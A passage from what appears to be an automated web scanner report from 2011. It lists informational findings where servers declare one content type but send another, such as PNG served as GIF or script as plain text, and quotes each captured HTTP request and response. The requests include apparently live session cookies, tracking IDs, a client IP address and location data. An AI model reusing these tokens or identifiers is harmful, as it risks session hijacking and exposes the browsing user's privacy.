Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DoLqSGBjoLb2Zmc2V0af6QnQ%3D%3D--ba45fc2687ffe9128b4ed829643a0bb02de5bef2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 9
ETag: "99914b932bd37a50b983c5e7c90ae93b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Df7saGBjoLb2Zmc2V0af6QnQ%3D%3D--615873154c6872e1f19a93062453dfc3552c4bd5; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 2
Connection: close
Content-Type: application/json; charset=utf-8

{}

29.16. http://charts.edgar-online.com/ext/charts.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://charts.edgar-online.com
Path:   /ext/charts.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ext/charts.dll?2-4-e-0-0-512-03NA000000RNWK&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=e0e0e0|A33=e0e0e0-ht=240-wd=540-FT:0=6-AP:9=2|10=2-FB:1=E6E6E6-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=336699-FF:1=336699-FL:18=336699-FF:18=336699-FL:5=000000-FF:5=000000-AT:9=1-FI:-IMAP=1 HTTP/1.1
Host: charts.edgar-online.com
Proxy-Connection: keep-alive
Referer: http://investor.realnetworks.com/stockquote.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: Keep-Alive
Expires: Tue, 19 Jul 2011 21:25:19 GMT
Content-type: text/plain
Content-length: 61

var arrEvents = new Array();


var initialized = true;


29.17. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i3.onlinehelp.microsoft.com
Path:   /areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css HTTP/1.1
Host: i3.onlinehelp.microsoft.com
Proxy-Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 103
Content-Length: 103
Date: Tue, 19 Jul 2011 15:16:07 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

29.18. http://investor.realnetworks.com/common/images/icon_share.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://investor.realnetworks.com
Path:   /common/images/icon_share.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /common/images/icon_share.gif HTTP/1.1
Host: investor.realnetworks.com
Proxy-Connection: keep-alive
Referer: http://investor.realnetworks.com/stockquote.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.2.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NOMOBILE=0; sifrFetch=true; RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A20%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783; RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204; __utma=123436755.2082772103.1311107120.1311107120.1311107120.1; __utmb=123436755.2.10.1311107120; __utmc=123436755; __utmz=123436755.1311107120.1.1.utmcsr=realnetworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact-us.aspx

Response

HTTP/1.1 200 OK
Content-Length: 3838
Content-Type: image/gif
Content-Location: http://investor.realnetworks.com/common/images/icon_share.gif
Last-Modified: Mon, 20 Jul 2009 16:54:59 GMT
Accept-Ranges: bytes
ETag: "7b465d15a9ca1:9aecb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:25:22 GMT

.PNG
.
...IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

29.19. http://media.gamehouse.com/7/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.gamehouse.com
Path:   /7/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /7/images/favicon.ico HTTP/1.1
Host: media.gamehouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; __qca=P0-962211929-1311107164228; s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107168409%7C1468787168409%3B%20s_invisit%3Dtrue%7C1311108968410%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "47e-4a821187bdb40"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 54898
Date: Tue, 19 Jul 2011 20:26:06 GMT
Last-Modified: Fri, 15 Jul 2011 20:00:05 GMT
Content-Length: 1150
Connection: keep-alive

............ .h.......(....... ..... .....@....................................................................{...|............................................. .............y...|...|................
...[SNIP]...

29.20. http://mobile.ebay.com/wp-content/themes/platformpro/images/iconMobileWeb_171x171.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mobile.ebay.com
Path:   /wp-content/themes/platformpro/images/iconMobileWeb_171x171.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /wp-content/themes/platformpro/images/iconMobileWeb_171x171.png HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/mobileweb/ebay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d0^cguid/3666b2e01300a47a44d622a6ffc19372500702d0^trm/svid%3D94316858148500702d0^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5Epsi%3DAsWCSaCg*%5E; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:58 GMT
Server: Apache
Last-Modified: Thu, 18 Nov 2010 23:51:31 GMT
ETag: "3b860c-1427-4955c7814c6c0"
Accept-Ranges: bytes
Content-Length: 5159
Cneonction: close
Content-Type: image/png

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

29.21. http://mobile.ebay.com/wp-content/themes/platformpro/images/imgSubPageContBG.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mobile.ebay.com
Path:   /wp-content/themes/platformpro/images/imgSubPageContBG.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /wp-content/themes/platformpro/images/imgSubPageContBG.gif HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/mobileweb/ebay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702fe^cguid/3666b2e01300a47a44d622a6ffc19372500702fe^trm/svid%3D94316858148500702fe^; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83687^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf87%5Epsi%3DAsWCSaCg*%5E

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:00 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 00:14:56 GMT
ETag: "3b85a7-11d-4955ccbd36000"
Accept-Ranges: bytes
Content-Length: 285
Cneonction: close
Content-Type: image/gif

.PNG
.
...IHDR.......t.....m.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..PA..0.......l/.y..&uxI.....z..
.`.z<UD.v.t..B..    .bL\Ff0....Xj"|...D..R.5..Y(uMm..5.."..=...<:_{.......Y....]O..`.Ys\r
...[SNIP]...

29.22. http://news.google.com/news/xhr/eit  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://news.google.com
Path:   /news/xhr/eit

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /news/xhr/eit HTTP/1.1
Host: news.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Referer: http://news.google.com/
Content-Length: 83
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-
Pragma: no-cache
Cache-Control: no-cache

&utu=true&hl=en&ned=us&pz=1&ptoken=AFQjCNF8hDomr7msY7YQPHcfBmmBS_Zzmg:1311108375207

Response

HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Date: Tue, 19 Jul 2011 20:46:48 GMT
Expires: Tue, 19 Jul 2011 20:46:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 2

{}

29.23. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1092&ref2=elqNone&tzo=360&ms=309 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.rallydev.com/agile_products/editions/community/signup/?ppc=google&kw=bug_tracking&gclid=CMWl_YzNjaoCFYpd5Qodq3Z4og
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=3FED00B3830C43E6A35A88AB0C1B4136; ELQSTATUS=OK; __utmz=16459234.1306359787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=2150246959903343989; __utma=16459234.18880641.1306359787.1306377949.1306389346.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:41 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

29.24. http://rac.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rac.custhelp.com
Path:   /ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png HTTP/1.1
Host: rac.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=AnhSJgx4ASUEbFIiUVJSNVUQBDwDEAE6B3sAMwYmUSsNfwVpV3ECOwUmVV8HL1MmATYBIAEhAWkCaQU5Bg8CeQtBAWpWGgEnVV9SGAY7VQcCWVJvDE0BdgQEUm1RO1JlVTAEIQNrAWgHIwAl; __utma=130296460.418147885.1311107160.1311107160.1311107160.1; __utmb=130296460.1.10.1311107160; __utmc=130296460; __utmz=130296460.1311107160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:58 GMT
Server: Apache
P3P: policyref="http://rac.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Thu, 18 Aug 2011 20:25:58 GMT
Content-Length: 801
RNT-Time: D=104344 t=1311107158371663
RNT-Machine: 01
X-Cnection: close
Content-Type: application/opensearchdescription+xml; charset="utf-8"

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

29.25. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=E361C23374E642C998D8ABA7166A75EC&MUID=E361C23374E642C998D8ABA7166A75EC&PG=OOLSCA&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 857
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8941475-T49420321-C10000000000050600
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Tue, 19 Jul 2011 15:19:23 GMT
Content-Length: 857


//<![CDATA[
function getRADIds() { return{"adid":"10000000000050600","pid":"8941475","targetid":"49420321"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...

29.26. http://real.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://real.custhelp.com
Path:   /ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png HTTP/1.1
Host: real.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
